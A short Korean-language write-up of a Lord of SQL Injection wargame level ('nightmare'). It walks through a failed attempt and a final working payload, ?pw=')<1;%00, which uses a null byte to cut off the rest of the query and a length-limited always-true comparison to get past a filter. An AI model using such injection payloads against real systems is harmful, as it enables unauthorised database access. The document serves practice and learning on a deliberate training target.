[Load of SQL Injection] nightmare

자세히 보면 id!='admin'입니다..!

따라서 pw값 뒤에는 모두 주석 처리를 하도록 시도해봅시다. 

'#', '-- ' 대신에 ;%00를 이용할 수 있습니다. 

 

그래서 처음엔 pw=1')||id='admin';%00를 해서, 

pw=('1')||id='admin';%00') and id!='admin'" 구문을 생각했으나..

strlen()>6에 의해서 막혀버렸습니다.

 

 

 

다음으로 생각해 낸 것이 바로 pw=('')<1 입니다. 

pw=''<1은 pw=''or'1'='1'과 같이 무조건 참이 되는 식 입니다. 

 

따라서, 

pw=('')<1;%00') and id!='admin'"

pw=('')<1;%00') and id!='admin'"

 

이 되서 문제가 풀리게 됩니다. 

URL + ?pw=')<1;%00

 

성공!